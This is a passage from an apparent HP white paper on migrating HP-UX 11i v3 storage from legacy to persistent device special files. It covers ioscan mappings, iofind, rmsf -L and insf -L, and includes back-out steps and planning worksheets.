In the example above the persistent DSF /dev/rdisk/disk17 maps to the legacy DSF /dev/rdsk/c9t0d0. The persistent DSF /dev/rdisk/disk37 maps to the legacy DSFs /dev/rdsk/c5t0d0 and /dev/rdsk/c8t0d0. This also implies that block persistent DSF /dev/disk/disk17 (not shown) maps to block legacy DSF /dev/dsk/c9t0d0.
Legacy Hardware Path to Lunpath Hardware Path mapping:
The ioscan \(-m\) hwpath \([-H\) hw_path] command shows the mapping between legacy hardware paths, lunpath hardware paths, and LUN hardware paths. If a hw_path is specified with option \(-H\), it shows the mapping for that hw_path only.
Sample:\n\nioscan -m hwpath output:
<table>
<thead>
<tr>
<th>Lun H/W Path</th>
<th>Lunpath H/W Path</th>
<th>Legacy H/W Path</th>
</tr>
</thead>
<tbody>
<tr>
<td>64000/0xfa00/0x10</td>
<td>0/2/1/0.0x0x0x0</td>
<td>0/2/1/0.0.0</td>
</tr>
<tr>
<td>64000/0xfa00/0x8</td>
<td>0/5/1/1.0x0x0x0</td>
<td>0/5/1/1.0.0</td>
</tr>
<tr>
<td>64000/0xfa00/0x1a</td>
<td>0/2/1/1.0x0x0x0</td>
<td>0/2/1/1.0.0</td>
</tr>
<tr>
<td></td>
<td>0/5/1/0.0x0x0x0</td>
<td>0/5/1/0.0.0</td>
</tr>
<tr>
<td>64000/0xfa00/0x1b</td>
<td>0/2/1/1.0x1x0x0</td>
<td>0/2/1/1.1.0</td>
</tr>
<tr>
<td></td>
<td>0/5/1/0.0x1x0x0</td>
<td>0/5/1/0.1.0</td>
</tr>
</tbody>
</table>
The Legacy H/W path is the hardware path for the legacy DSF. The Lun H/W path is the virtualized hardware path representing the LUN. The Lunpath H/W Path is the physical hardware path to the LUN. The LUN under Lun H/W Path 64000/0xfa00/0x1a shows that it has two lunpaths leading to it. Note that the last two elements of a LUN H/W path and a Lunpath H/W path use the hexadecimal notation instead of the decimal notation.
**Benefits of Migrating to the Persistent DSF Naming Model**
**Enhanced Features**
The HP-UX 11i v3 mass storage stack provides major enhancements for performance, management, scalability, availability, and serviceability. A major component of the new architecture is the new persistent DSF naming model. Using persistent DSFs simplifies I/O management and diagnostics and allows users to take full advantage of the rich set of new functionality.
Unlike legacy DSFs, persistent DSFs are path independent. Because of this a LUN can be moved around to different paths with its persistent DSF name remaining the same. An example of this would be moving a Fibre Channel connection into a new HBA, legacy DSFs would change but persistent DSFs would see the new path and keep the same DSF. This feature eliminates the need for applications to change their configuration information.
The path-independent nature of a persistent DSF offers the benefit of simplified management. Each persistent DSF represents a LUN, unlike a legacy DSF which is really a path to a LUN. In a multi-path environment, the number of persistent DSFs is smaller than the number of legacy DSFs. Applications do not have to be aware of multi-pathing, simply using a persistent DSF provides multi-pathing support.
Persistent DSFs offer significant scalability over legacy DSFs. The architectural limit is 16 million LUNs in the persistent view, versus 32,768 in the legacy view.
- **Note:** To enable a smooth migration from legacy to persistent DSFs, HP-UX 11i v3 supports coexistence of both types of DSFs, and commands can display their output in either view or show the mapping, allowing users to learn about management in the agile view while still having access to management in the legacy view. Note also that legacy DSFs are deprecated in HP-UX 11i v3 and will be obsoleted in a future release of HP-UX.
New I/O Management Commands in HP-UX 11i v3
scsimgr
A new utility, scsimgr, is provided for management and diagnostics of SCSI objects (such as a single LUN, LUN path, target path, host bus adapter (HBA), or a group of these) and subsystems (SCSI services module, a SCSI class driver, or a SCSI interface, also known as interface driver). Most of the options to this utility are used in the agile view (requiring persistent DSFs as input).
Migration to the persistent DSFs offers an enhanced experience in I/O management and diagnosis of the mass storage stack.
For more information, see scsimgr(1M) and the scsimgr SCSI Management And Diagnostics Utility on HP-UX 11i v3 white paper at http://www.hp.com/go/hpux-core-docs. Click on HP-UX 11i v3 and scroll down to the White papers section.
io_redirect_dsf
Another new command, io_redirect_dsf, allows users to change the association of a persistent DSF from device A to device B without a reboot and without the need to change any application configuration information. After the operation, applications using the DSF of device A can transparently access device B. This command only accepts persistent DSFs or LUN hardware paths.
Example:
Disk A with DSF /dev/disk/disk1 becomes non-operational. Users may want to direct any further I/O access from disk A to disk B (with DSF /dev/disk/disk5, which is already in the system) without rebooting and/or changing application configuration.
For more information, see io_redirect_dsf(1M).
iobind
Another new HP-UX 11i v3 command is iobind. It performs online binding of a driver to a device. The driver must however support online binding. One of the arguments to this new command is a LUN hardware path. Since a persistent DSF is mapped to a LUN hardware path, users can easily find out the required hardware path from the persistent DSF by using the "ioscan –m lun [dsf_name]" command.
For more information, see iobind(1M).
Enhanced Commands
New command line options have been added to some I/O commands to allow users to manage their system in the agile view.
ioscan The ioscan command has been enhanced to work with the agile view of the I/O system. Certain options will only be applicable to this view:
- ioscan –N [other options]: Display output in the agile view.
- ioscan –b –M driver_name –H hw_path: The –b option specifies deferred binding of a driver to the given hardware path. The input parameter hw_path must be the LUN hardware path in the agile view.
- ioscan –m keyword [parameters]: This option shows mapping information between paths and/or devices. The –m option takes one of these keywords: lun, dsf, or hwpath. Parameters to the lun keyword must be in the agile view; parameters to the dsf and
hwpath keywords can be either from the legacy or agile view.
- `ioscan -P keyword [-H hw_path]`: This option displays the properties of system hardware. The `-P` option takes one of the keywords (such as `health`, `instance`, and so on); for a complete list, see the `-P` option in `ioscan(1M)`. The `hw_path` parameter is from the agile view and the display uses the agile view as well.
- `ioscan -r -H hw_path`: The `-r` option removes a deferred driver binding. Input parameter must be in the agile view.
For more information, see `ioscan(1M)`.
### rmsf
This command accepts either legacy or persistent DSF. It has a new option, `-L`, to disable the legacy naming model and remove legacy DSFs on the system.
### insf
This command creates both legacy and persistent DSFs. It also has a new option, `-L`, to re-enable the legacy naming model and recreate legacy DSFs on the system. The combination of the `-Lv` options report whether the legacy naming model is enabled on the system or not.
### lssf
This command accepts both legacy and persistent DSFs.
### mksf
This command creates either legacy or persistent DSFs.
---
## Read before Migrating to HP-UX 11i v3
Before migrating to HP-UX 11i v3, HP recommends users to become familiar with the following documentation:
- For an overview of the mass storage changes and a list of enhanced I/O commands available in HP-UX 11i v3, see The Next Generation Mass Storage Stack HP-UX 11i v3 white paper at [http://www.hp.com/go/hpux-core-docs](http://www.hp.com/go/hpux-core-docs). Click on HP-UX 11i v3 and scroll down to the White papers section.
- For an overview of the migration from HP-UX 11iv2 to 11iv3 with emphasis on mass storage, see the Mass Storage Stack Update Guide white paper at [http://www.hp.com/go/hpux-core-docs](http://www.hp.com/go/hpux-core-docs). Click on HP-UX 11i v3 and scroll down to the White papers section.
- For an overview of LVM migration from legacy to agile naming model, see the LVM Migration from legacy to agile naming model HP-UX 11i v3 white paper at [http://docs.hp.com/en/hpux11iv3.html#LVM%20Volume%20Manager](http://docs.hp.com/en/hpux11iv3.html#LVM%20Volume%20Manager)
See also at the same location:
LVM New Features in HP-UX 11i v3 white paper
HP-UX System Administrator’s Guide: Logical Volume Management
Other useful links:
Agile Naming Support
This section discusses limitations to agile naming support (that is, the use of persistent DSFs) at the introduction of HP-UX 11i v3, as well as backward compatibility and backward compatibility exceptions.
Subsystems with No Persistent DSF Support at HP-UX 11i v3 Introduction
The subsystems listed below do not currently support the use of persistent DSFs. Use of persistent DSFs may require, as detailed below, that users replace an existing subsystem with a different one, or that they use a later version of that subsystem, which may not be available at HP-UX 11i v3 introduction. HP recommends that users check the following web sites or in the Read before Migrating to HP-UX 11i v3 section for the latest information on possible replacement products and on newer subsystems versions that would support the use of persistent DSFs.
The following subsystems and applications do not support persistent DSFs at the first release of HP-UX 11i v3:
- **HP Openview Storage Data Protector 6.0**: Support of persistent DSFs is provided in patch PHSS_36400.
- **HP Openview Storage Data Protector 5.5**: Openview Storage Data Protector 5.5 servers are not supported in HP-UX 11i v3. Openview Storage Data Protector 5.5 clients support legacy DSFs only. Users must migrate to DP 6.0 (or later version) to get support for persistent DSFs with the HP Openview Storage Data Protector software.
- **HP Storage Works Command View SDM**: supports legacy DSFs only.
- **Library & Tape Tools version 4.2 SR1**: is required for support in HP-UX 11i v3 with both legacy and persistent DSFs.
- **Storage System Scripting Utility (SSSU)**: Version 6.0 and lower does not support persistent DSFs. Version 6.0.2 or later is required for persistent DSF support.
- **dvd+rw tools** (commands like `growisofs` or `dvd+rw-format`) operate properly with legacy DSFs only.
- **vPars** does not support creation or modification of virtual partitions using the agile view. But you can use persistent DSFs on the partition after the partition has been created. For more information on vPars, see [http://docs.hp.com/en/vse.html#vPars](http://docs.hp.com/en/vse.html#vPars).
- **VERITAS Volume Manager (VxVM) 4.1**: supports legacy DSFs only. Persistent DSFs are supported in VxVM 5.0. For more information, see [http://docs.hp.com/en/oshpux11iv3.html#VxVM](http://docs.hp.com/en/oshpux11iv3.html#VxVM) and the Migration from Legacy to Agile Naming Model in VxVM 5.0 on HP-UX 11i v3 white paper at: [http://docs.hp.com/en/5992-4212/5992-4212.pdf](http://docs.hp.com/en/5992-4212/5992-4212.pdf).
- **Third-party applications** related to mass storage: Users must check with the vendors whether the applications are impacted by the persistent DSFs and if they are, whether it is possible to use them with persistent DSFs.
**NOTE:** If you use any applications that do not support agile naming, be aware that a full migration (removing the legacy view with the `rmsf -L` command) might not be possible. See the Disable Legacy DSFs section.
Subsystems Requiring the Legacy View at HP-UX 11i v3 Introduction
The following application requires the legacy view to not be removed at the first release of HP-UX 11i v3:
- **Ignite-UX**: If you create an Ignite-UX image of your system and later remove the legacy view with the `rmsf -L` command, you cannot restore your system with the image.
**NOTE:** If you use any applications that do not support agile naming or that require you not to remove the legacy view, be aware that a full migration (removing the legacy view with the `rmsf -L` command) might not be possible. See the Disable Legacy DSFs section.
Backward Compatibility
Legacy DSF support is maintained in HP-UX 11i v3 to retain backward compatibility. HP-UX commands and utilities have been enhanced to manage subsystems in both legacy and agile views. By default those commands behave the same way in HP-UX 11i v3 as on prior HP-UX releases. For instance, the output of most commands is the same in HP-UX 11i v2 and in HP-UX 11i v3 (for options supported on both releases). See the Backward Compatibility Exceptions section for the list of exceptions.
Note that some commands display either agile view or legacy view depending on which view was used during their configuration. For these commands, if the agile view was used to configure some devices, the commands will display these devices in the agile view. For example, the LVM commands may display persistent DSFs, legacy DSFs, or a mix of both, depending on which DSFs were used when the LVM configuration was created.
Fully Backward Compatible Commands and Utilities
Most commands are fully backward compatible, meaning that in the legacy view, they behave the same way as they did on releases prior to HP-UX 11i v3. Here are examples of such commands:
- **ioscan(1M)** - Specify the `-N` option as necessary to manage the agile view. Without the `-N` option, output appears the same as in HP-UX 11i v2 if using options supported on both releases (for example, `ioscan -kfn` will still show legacy hardware paths and legacy DSFs).
- **rmsf(1M), insf(1M), lssf(1M), mksf(1M)** - Accept legacy and persistent DSFs and hardware paths as input.
- **savecrash(1M)** - Accepts both legacy and persistent DSFs as input.
- **swapon(1M)** - Accepts both legacy and persistent DSFs as input.
- **swapinfo(1M)** - Displays either persistent or legacy DSF, depending on what was configured.
- **STM** - Provides a menu option to display in legacy or agile view.
- **System Management Homepage (SMH)** - Provides a toggle to allow users to display in legacy or agile view.
- **LVM commands** - Accept both legacy and persistent DSFs as input. New options have been introduced to allow a choice between legacy DSFs and persistent DSFs. For example, the `-N` option has been added to the `vgscan` command to perform `/etc/lvmtab` recovery using persistent DSFs. Without the `-N` option, `vgscan` behaves as in HP-UX 11i v2, using legacy DSFs. See the LVM documentation mentioned in Read before Migrating to HP-UX 11i v3.
Backward Compatibility Exceptions
The following commands and utilities behave differently in HP-UX 11i v3 than in previous HP-UX releases:
- **The crashconf command** accepts persistent DSFs as input. For backward compatibility, it accepts legacy DSFs, but it converts them to persistent DSFs, and its output is displayed in the agile view only (persistent DSFs are displayed with option `-v` and lunpath hardware paths are displayed with the option `-i`). For more information, see `crashconf(1M)`.
- **The setboot command** accepts persistent DSFs as input as well as lunpath hardware paths, or legacy hardware paths, but it selects and stores in stable storage the lunpath hardware path to the device, and subsequently it only displays output in the agile view (persistent DSFs and lunpath hardware paths), regardless of whether a legacy hardware path was passed as input. For more information, see `setboot(1M)`.
- **Ignite-UX** operates in the agile view. It displays lunpath hardware paths for the location of the target install media in the root disk selection screen. The mapping of lunpath hardware paths to legacy
Migrating to the Agile Naming Model
When HP-UX 11i v3 is installed, both legacy and persistent DSFs are created on the system. Both types of DSFs can coexist and may be used simultaneously to access mass storage devices. However, only the use of persistent DSFs allows the users to get the full benefits of the agile naming model. Therefore, HP recommends users to migrate applications using legacy DSFs and hardware paths to the agile naming model.
This section defines the steps to migrate from using legacy DSFs to using persistent DSFs. In most cases, user applications perform I/O through DSFs. In rare cases, they may reference hardware paths. Hardware paths apply to various types of elements, such as cell, HBA, and device. If users have applications that reference such hardware paths for devices beyond a mass storage HBA (legacy hardware paths), these hardware paths must be migrated to the lunpath hardware paths as well.
Migrating legacy DSFs to persistent DSFs involves both preparation steps and migration steps.
Preparation
Preparation steps include identifying the applications and files that need to be migrated and saving original copies of those files in case you need to back out the migration. To help with the identification, here are the main changes that could affect an application:
- New DSF names and hardware path formats (see Formats of DSFs and Hardware Paths for Mass Storage Devices)
- New DSF location (for instance, moved from /dev/[r]dsk to /dev/[r]disk)
- New command options to retrieve DSF names and hardware paths (for instance, add --N option to ioscan)
- Decoding of DSF names and dev_ts is different as they no longer encode HBA/target/lun information
If you have written your own applications, look for the impacts above in the code.
Migration
Migration steps include making the actual modifications to the applications and files, testing the modified applications, and finally disabling legacy naming model which removes the legacy DSFs. If the modified applications run into issues, it might be necessary to back out the migration (return to using legacy DSFs) (see Backing Out From Migration section). The steps for migrating legacy DSFs to persistent DSFs are as follows:
Make an IUX Recovery Tape
Objective: Ensure the system can be recovered to the current state
Back up the system to a recovery tape. See the section “Backing Up Your System” in the Ignite-UX Administration Guide available at http://www.hp.com/go/sw-deployment-docs. Click on HP-UX Ignite-UX and scroll down to the User guide section.
Identify System Configuration Files That Use Legacy DSFs/Hardware Paths
This section discusses HP-UX subsystems that may be configured in a user's system. A system can be configured with LVM, VxVM, or whole disk (neither LVM nor VxVM).
- **LVM is configured**
The LVM configuration is maintained in the binary file `/etc/lvmtab` and optionally the ASCII file `/etc/lvmpvg`, which may contain legacy DSFs, persistent DSFs, or a mix of both. LVM provides the `/usr/contrib/bin/vgdsf` tool for migrating the LVM configuration from legacy DSFs to persistent DSFs. For activated volume groups, the `vgdisplay` command with the `–v` option displays which DSFs a volume group is using. However, users must migrate all LVM volume groups, not only the activated ones. For more information, see the LVM Migration from legacy to agile naming model HP-UX 11i v3 white paper at [http://docs.hp.com/en/hpux11iv3.html#LVM%20Volume%20Manager](http://docs.hp.com/en/hpux11iv3.html#LVM%20Volume%20Manager) for LVM migration details.
**Note:** Be sure to migrate the `/etc/lvmpvg` ASCII file using the `vgdsf` tool and not using the `iofind` tool as `vgdsf` takes other actions required for proper LVM migration.
For LVM boot disk, run the `lvlnboot` command with the `–v` option to see if LVM is using legacy DSFs or persistent DSFs for boot, swap, or dump. If LVM is using legacy DSFs for boot, swap, or dump, users must
- run the `/usr/contrib/bin/vgdsf –c vg_name` command to migrate the LVM configuration for the root volume group `vg_name` from legacy DSFs to persistent DSFs
- run the `lvlnboot –R /dev/vg_name` to migrate the LVM on-disk boot information to match `/etc/lvmtab`.
See the LVM documentation in the Read before Migrating” to HP-UX 11i v3 section for more details.
- **VxVM is configured**
Agile view is not supported with VxVM 4.1. Therefore users cannot migrate to persistent DSFs if they use VxVM 4.1. VxVM 5.0 provides support for the agile view.
- **Whole disk configuration is used (neither LVM nor VxVM)**
For whole disk configurations, typically a single boot disk has been configured for boot, swap, and dump using either a legacy DSF or a persistent DSF. If a system is updated from HP-UX 11i v2 to HP-UX 11i v3, the update process migrates the legacy configuration to the agile view.
Users can verify the configuration by using the `bdf` command to check the file system configuration, the `setboot` command to check the boot path, the `crashconf` command to check the dump device, and the `swapinfo` command to check the swap device. The `setboot` and `crashconf` commands automatically convert the configured DSFs into agile view. If `swapinfo` displays any configured legacy DSFs, use the `swapon` command to perform the migration.
The `/etc/fstab` and `/stand/system` files contain information about the file system and other system configuration. Swap and dump devices may be configured in `/etc/fstab` and `/stand/system`. If these two files contain legacy DSFs or legacy hardware paths, migrate them to persistent DSFs or lunpath hardware paths either manually or by using the `iofind` tool described below. Make sure to backup the files first before making any changes. Note that modifications to the `/etc/fstab` and `/stand/system` files may require a reboot to take effect. For more information, see `bdf(1M), crashconf(1M), setboot(1M), swapinfo(1M), swapon(1M), and fstab(4)`.
Execute the iofind command
Objective: Find instances of legacy DSFs and hardware paths in ASCII files on the system and help the user to convert them to the agile view.
The `iofind` command scans ASCII files in the system to identify those containing legacy DSFs and legacy hardware paths. The `-d` option specifies the directories in which to search. The `-i` option specifies the files to scan. To look for specific legacy information (DSFs or hardware paths), specify them in a file using the `-f` option. The default is to search all files and subdirectories under the current directory (where `iofind` is run) for all legacy DSFs and hardware paths configured. To speed up performance, some directories are excluded from the search using an exclusion list. Users can modify this exclusion list. If the search starts from the root directory and the file system is large, redirect the output to a file as the tool may take a long time to execute.
Other command options give users the flexibility to display the legacy information found in the files, replace them interactively with persistent DSFs and hardware paths from the agile view (`-R` option), replace them without user interaction (`-F` option), or only simulate the replacement (`-p` option). Before replacing the legacy information, the original files are backed up up in the `/var/adm/iofind/logs/mmddyy_hmmss/backup/` directory. HP recommends users to make notes of the names of the modified files and the backup directory. To search every ASCII file in the system for all legacy DSFs and hardware paths known by the system (based on the `ioscan -kfn` output), run the `iofind` command from the root directory with only the `-Hn` options. If some files are found that contain legacy information, determine
- whether these files need to be modified, and
- whether additional migration steps are required by the applications referencing these files.
If there are additional migration steps required by the applications, follow their instructions. To migrate the files identified by `iofind`, run the `iofind` command again with the `-R` option.
If you think there might be unconfigured mass storage devices in the system, run `ioscan -fn` before executing `iofind`. This step ensures that all legacy DSFs and hardware paths have been configured and subsequently all legacy references to these devices will be found by the `iofind` command.
For more information, see `iofind(1M)`.
If the modified ASCII files are executable (such as shell scripts), test them to make sure that they still perform as expected. If the ASCII file is an input to an application, test the application as well.
See examples of using `iofind` in the Appendix.
Recompile User Applications
There are two cases where legacy information may be referred to by a binary program:
- A binary program file reads an ASCII file as an input during run time.
- A source file has embedded legacy DSFs and/or hardware paths and it is compiled into binary application.
The `iofind` command will have replaced the legacy information for the first case. For case 2, if the source file is in the system where `iofind` is run, the (ASCII) source will have been updated with persistent data and the source must be recompiled. If the source file is not on the system where `iofind` executes, then the source file must be modified manually with the information from `ioscan` outputs as described above (see Mapping Commands), then recompiled. Backup the source files and binary before making the modifications and recompiling. Make notes of what changes are made to the source files. Test the modified applications to ensure successful execution.
Identify User Applications That Require DSFs or Hardware Paths as Input
There may be applications that need DSFs and/or hardware paths for mass storage devices as input. For example, a database application may require a user to type in a DSF. Identify such applications and map the legacy DSFs and hardware paths to persistent DSFs and lunpath hardware paths using the `ioscan` outputs as described above (see Mapping Commands). Test the applications. Make notes of what changes are needed and record the changes.
Save Other Configuration Files
In addition to saving the original files (found by `iofind` and other user applications) before migrating them, there is other information that needs to be saved for diagnostic purposes in case there are issues with migration. Save the following output to files before performing the last step in migration (Disable Legacy DSFs below):
Outputs of:
- `ioscan -kfnN`
- `ioscan -kfn`
- `ioscan -m dsf`
- `ioscan -m hwpath`
- `ll /dev/dsk`
- `ll /dev/rdsk`
- `ll /dev/rmt`
NOTE: Worksheets at the end of this document give examples on what information to save.
Disable Legacy DSFs
After users have made all the changes described in the steps above and checked that the migrated applications work using agile view, there are two ways to complete the migration:
1. Full migration
- Disable legacy naming model (will remove the legacy DSFs)
- Test applications with legacy naming model disabled
If all the migrated applications work as expected, the migration is complete.
2. Partial migration
If there are applications with limited support for persistent DSFs (such as the ones discussed above), there are two approaches that can be taken:
- Disable legacy naming model and test the applications that support running in the agile view to make sure that they are operating successfully with legacy naming model disabled. Then re-enable legacy naming model to be able to use those applications that need legacy naming model. This testing ensures that the applications that were migrated to agile view have been migrated successfully.
or
- If disabling the legacy naming model is not possible due to the application limitations, simply continue to operate with the legacy naming model enabled. However, since the legacy naming model is still enabled, it is not certain that applications have been migrated successfully to agile view.
Full Migration Details
To disable legacy DSFs, a new option (-L) has been added to rmsf to disable (remove) the legacy naming model. See the Appendix for an example of rmsf -L. After execution, all the legacy information (in the kernel and legacy DSFs under /dev directories) is removed. To reverse this step, see the Backing Out From Migration section.
Perform the following steps to do a full migration:
- Run rmsf -L. This command first performs a critical resource analysis. If some legacy DSFs are still open, the command fails. The insf -Lv command displays whether the legacy naming model is enabled or not.
NOTE: Automatic migration of dump devices occurs using Event Management (EVM) events when rmsf -L completes successfully.
- After this command has been successfully executed, access to mass storage devices via their legacy DSFs and paths will fail. Note also that ioscan will no longer display mass storage device information in the legacy view.
- Test the applications to make sure that they are running successfully. If everything works, migration is complete.
TIP: If there is any failure, the reason can be that an application is still trying to access a legacy DSF; check the syslog file for error messages related to opening of DSFs.
If there are any issues that users cannot correct, see the Backing Out From Migration section.
NOTE: On a system with multiple boot disks containing different OS versions, if an HP-UX 11i v3 system crashes with legacy naming model disabled and the next boot is on a pre-HP-UX 11i v3 (for instance, HP-UX 11i v2) system, savecrash cannot save the dump.
In this case, the boot otherwise succeeds, and the dump can still be saved manually, using the -D option to savecrash and specifying the appropriate device files.
Note: See the Appendix for examples of rmsf -L and insf -L.
Partial Migration Details
If some applications were modified to run in the agile view but a full migration is not possible because other applications with limitations (such as the ones discussed in the prior section) require the legacy naming model to be enabled, users can still validate the changes for the applications that were modified by disabling the legacy naming model using the steps below:
- Run the rmsf -L command to disable the legacy naming model and test the modified applications to ensure their successful execution as discussed previously under the Full Migration Details section.
- Run the insf -L command to re-enable the legacy naming model so that other applications that require legacy naming model can also operate properly. This command re-installs the legacy naming model and recreates the legacy DSFs as they were before. The ioscan command displays the legacy view again after this command is executed. Users can check whether legacy naming model is re-enabled by running insf -Lv.
Note: See the Appendix for examples of rmsf -L and insf -L.
Backing Out From Migration
This section discusses how to back out the changes made during the migration steps above in case there are any problems encountered during or after the migration. A new option (-L) to insf restores the legacy configuration back onto the system and recreates the legacy DSFs as they were before. The following are the steps to back out from a migration:
Step 1: Run insf -L. This command re-enables the legacy naming model and recreates the legacy DSFs as they were before.
Step 2: Restore the ASCII files modified by iofind from the /var/adm/iofind/logs/mmddyy_hhmmss/backup/ directory to their original directories.
Step 3: Restore the backup binary applications (if any).
Step 4: If LVM is used, see the LVM Migration from legacy to agile naming model HP-UX 11i v3 white paper at http://docs.hp.com/en/hpux11iv3.html#LVM%20Volume%20Manager for backing out LVM migration (the LVM commands are vgextend and vgreduce). If whole disk configuration is used and changes were made to /etc/fstab and /stand/system, restore the original /etc/fstab and /stand/system. A reboot might be required.
Step 5: Retry the original applications to verify that they are operating properly again. The original applications work as before if everything has been restored as it was before. If this is the case, the back out is successful. Otherwise, do recovery in Step 6.
Step 6: Restore the system from IUX Recovery Tape. (Perform this only if Step 5 fails)
Conclusion
To take advantage of the benefits of the agile naming model, HP recommends users migrate their affected applications to use persistent DSFs. Users first need to understand the impact and define the changes to be made. Some restrictions might apply initially and may prevent a full migration, but the coexistence with the legacy naming model allows users to take a phased approach.
Planning Worksheets
This section lists sample worksheets (in table format) to identify, collect, document, and migrate legacy DSFs and hardware paths. If users have applications referencing legacy hardware paths, these paths need to be migrated as well. The lists document what needs to be changed and provide a record to recover from in case there are any problems with the migration.
These records are for illustration purposes only and the DSFs, hardware paths and file names listed are examples. Users would most likely save electronic copies of `ioscan` and other command output as well (per the migration steps above).
1. Mapping legacy to persistent DSF. The following table is derived from the output of `ioscan -m dsf`. This table is needed if there are any applications referencing legacy DSFs.
Persistent DSF Legacy DSF(s).
/dev/rdisk/disk14 /dev/rdsk/c7t0d0
/dev/rdsk/c4t0d0
2. Mapping legacy hardware path to lunpath hardware path. The following table is derived from the output of `ioscan -m hwpath`. This table is only needed if there are any applications referencing legacy hardware paths.
LUN Hardware path Lunpath Hardware path Legacy hardware path
64000/0xfa00/0x6 0/1/0.0x0.0x0 0/1/0.0.0
3. List of ASCII files changed by the `iofind` command
Files changed by `iofind` Original files saved at: What changed?
/usr/adm/myconfig /var/adm/iofind/logs/mmddyy_hhmmss Line 5:
/backup/usr/adm/myconfig From /dev/dsk/c8t1d0
To /dev/disk/disk6
/usr/adm/myperl.pl /var/adm/iofind/logs/mmddyy_hhmmss Line 20:
/backup/usr/adm/myperl.pl From /dev/rdsk/c3t0d0
To /dev/disk/disk20
/etc/fstab /var/adm/iofind/logs/mmddyy_hhmmss Line 6:
/backup/etc/fstab From /dev/dsk/c2t0d0s2
To /dev/disk/disk22_p2
4. List of other files changed (recompiled/migrated).
This list is to record any applications that need recompilation/migration.
(Other) files changed Original files saved at: What was changed?
/usr/contrib/myprogramA.c /tmp/mysave/myprogramA.c Line 15:
From /dev/rdsk/c1t0d2
To /dev/rdisk/disk28
/usr/contrib/myprogramB.c /tmp/mysave/myprogramB.c Line 20:
From 0/4/1/0.1.0
To 0/4/1/0.0x1.0x0
5. List of other applications that require manual legacy DSF/hardware path input during execution. This list contains names of any applications that require users to input legacy parameters, such as a database application which needs a user to enter legacy information.
<table>
<thead>
<tr>
<th>Name and directory of apps</th>
<th>Legacy information</th>
<th>Agile view information</th>
</tr>
</thead>
<tbody>
<tr>
<td>/usr/admin/mydatabase</td>
<td>/dev/dsk/c5t1d0</td>
<td>/dev/disk/disk25</td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th>Name of subsystem configuration</th>
<th>Legacy information</th>
<th>Agile view information</th>
</tr>
</thead>
<tbody>
<tr>
<td>Dump</td>
<td>/dev/dsk/c9t2d0</td>
<td>/dev/disk/disk16</td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
7. Location of other saved files
This list is for verification and recovery.
a. The ioscan output will help to determine what has changed in the system configuration.
b. The files in /dev/dsk/, /dev/rdsk/, and /dev/rmt directories represent the legacy DSFs.
**IMPORTANT:** Save these files before running `rmsf -L` because this command removes the legacy configuration from the system. The saved files will serve as a record.
<table>
<thead>
<tr>
<th>Files</th>
<th>Saved at</th>
</tr>
</thead>
<tbody>
<tr>
<td>Save the following before running "rmsf –L":</td>
<td>(For illustration purpose, the saved files are called "b4")</td>
</tr>
<tr>
<td>ioscand -mdsf > /tmp/mysave/ioscan.dsf.b4</td>
<td>/tmp/mysave/ioscan.dsf.b4</td>
</tr>
<tr>
<td>ioscand -kfnN > /tmp/mysave/ioscan.kfnN.b4</td>
<td>/tmp/mysave/ioscan.kfnN.b4</td>
</tr>
<tr>
<td>ioscand -kfn > /tmp/mysave/ioscan.kfn.b4</td>
<td>/tmp/mysave/ioscan.kfn.b4</td>
</tr>
<tr>
<td>ioscand -m hwpath > /tmp/mysave/ioscan.hwpath.b4</td>
<td>/tmp/mysave/ioscan.hwpath.b4</td>
</tr>
<tr>
<td>ll /dev/dsk > /tmp/mysave/dsk.b4</td>
<td>/tmp/mysave/dsk.b4</td>
</tr>
<tr>
<td>ll /dev/rdsk > /tmp/mysave/rdsk.b4</td>
<td>/tmp/mysave/rdsk.b4</td>
</tr>
<tr>
<td>ll /dev/rmt > /tmp/mysave/rmt.b4</td>
<td>/tmp/mysave/rmt.b4</td>
</tr>
</tbody>
</table>
Appendix
Examples of using iofind
Example 1 - Find files containing the DSF names (/dev/dsk/c0t0d0 and /dev/dsk/c2t0d0) starting at the directory /opt, and preview the replacement with persistent DSFs. This example assumes that there is a user file, /opt/myconfig, containing DSF /dev/dsk/c2t0d0.
A. Create a file /var/adm/mydsf containing two lines:
/dev/dsk/c0t0d0
/dev/dsk/c2t0d0
B. Run: iofind -n -f /var/adm/mydsf -d /opt -R -p
C. The utility displays files found and asks if you want to change the DSF name in all occurrences found. Since this is a preview, the changes are not done on the original file but put into a preview directory. The following is the output from the iofind command:
The following occurrences of /dev/dsk/c2t0d0 was found in file /opt/myconfig:
FileName:Line Number: Matching Pattern
____________________________________
/opt/myconfig:425:# my device name (e.g. /dev/dsk/c2t0d0)
Do you want iofind to replace /dev/dsk/c2t0d0 with /dev/disk/disk3 :(Y)Yes;(N)No;Q(Quit)
? Y
Replaced /dev/dsk/c2t0d0 with /dev/disk/disk3 in file /var/adm/iofind/logs/013007_142244/preview/opt/myconfig
D. Review the logging files under /var/adm/iofind/logs/mmddyy_hhmmss (the exact location is provided by the tool). You can view all the files with matching instances found.
When the tool is run the first time, the iofind command creates an exclusion list at /var/adm/iofind/cfg/iofind_exclude.cfg. This file includes directories that do not likely contain ASCII configuration files with legacy information. Searching files in these directories may slow down the tool execution.
Review the contents of this exclusion file to make sure that there is no file or directory that should be searched. If there is any, remove the file or directory name from the exclusion file and run iofind again.
Example 2 – Run the same command as above, but without the preview option. If you are satisfied with the preview results, you may run the tool again and go ahead with the real changes (do not specify -p for preview):
# iofind -n -f /var/adm/mydsf -d /opt -R
The following are output from the iofind command:
Matching instances will be displayed as follows:
The following occurrences of /dev/dsk/c2t0d0 was found in file /opt/myconfig:
FileName:Line Number: Matching Pattern
____________________________________
/opt/myconfig:425:# my device name (e.g. /dev/dsk/c2t0d0)
Do you want iofind to replace /dev/dsk/c2t0d0 with /dev/disk/disk3 :(Y)Yes;(N)No;Q(Quit)
? Y
Replaced /dev/dsk/c2t0d0 with /dev/disk/disk3 in file /opt/myconfig
This time, the “Y” answer makes the modification in the file. A backup is saved under
/var/adm/iofind/logs/mmddyy_hhmmss/backup.
**Example 3** – Search for all possible DSFs and hardware paths across all files on the system. For this, run the following command:
```
# iofind -n -H -d /
```
Note: As this command may take a long time to execute, users may want to redirect the output to a file
myoutput, execute the command in background, and monitor the progress by looking at the increasing size of
the myoutput file. The command syntax is as follows:
```
# iofind -n -H -d / > myoutput &
```
This command generates a list of known DSFs and hardware paths from `ioscan -kfn` and searches all files
under / and its subdirectories, except for the files and directories listed in the exclusion list. This command may
take a long time to execute as it must check all the ASCII files on the system.
